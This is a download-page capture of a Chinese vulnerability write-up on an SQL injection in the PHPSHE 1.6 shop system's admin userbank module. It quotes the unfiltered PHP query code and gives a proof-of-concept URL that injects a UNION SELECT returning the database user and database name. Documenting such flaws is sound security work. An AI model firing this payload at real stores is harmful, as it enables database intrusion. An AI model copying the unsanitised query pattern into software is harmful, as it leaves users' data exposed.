没有合适的资源?快使用搜索试试~ 我知道了~
PHPSHE 1.6 userbank sql注入1
需积分: 0 0 下载量 8 浏览量
2022-08-04
00:42:49
上传
评论
收藏 341KB PDF 举报
温馨提示
试读
1页
##漏洞分析www/module/admin/userbank.php 文件 存在漏洞username , userbank_tname , userbank_
资源详情
资源评论
资源推荐
PHPSHE 1.6 userbank sql注入
##漏洞描述## PHPSHE商城系统是将商品展示、在线购物、订单管理、支付管理、文章管理、客户咨
询反馈等功能相结合,为用户提供了网上商城建设方案。 PHPSHE开源商城系统userbank页面存在SQL
注入漏洞,由于系统未能对用户输入的参数进行严格过滤。攻击者可利用该漏洞获取数据库敏感信息。
##漏洞分析
www/module/admin/userbank.php 文件 存在漏洞
username , userbank_tname , userbank_num , userbank_type 参数没有进行过滤直接进入sql语句导
致注入漏洞产生。
漏洞证明:
default:
$_g_name && $sqlwhere .= " and `user_name` like '%{$_g_name}%'";
$_g_tname && $sqlwhere .= " and `userbank_tname` like '%{$_g_tname}%'";
$_g_num && $sqlwhere .= " and `userbank_num` like '%{$_g_num}%'";
$_g_type && $sqlwhere .= " and `userbank_type` = '{$_g_type}'";
$_g_user_id && $sqlwhere .= " and `user_id` = '{$_g_user_id}'";
$sqlwhere .= " order by `userbank_id` desc";
$info_list = $db->pe_selectall('userbank', $sqlwhere, '*', array(50,
$_g_page));
$tongji['user'] = $db->pe_num('user');
$tongji['useraddr'] = $db->pe_num('useraddr');
$tongji['userbank'] = $db->pe_num('userbank');
$seo = pe_seo($menutitle='收货地址');
include(pe_tpl('userbank_list.html'));
break;
http://127.0.0.1/admin.php?
mod=userbank&name=&num=123'+union+select+user(),2,3,4,5,6,7,8,database()#&tname=
&type=
思想假
- 粉丝: 28
- 资源: 326
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0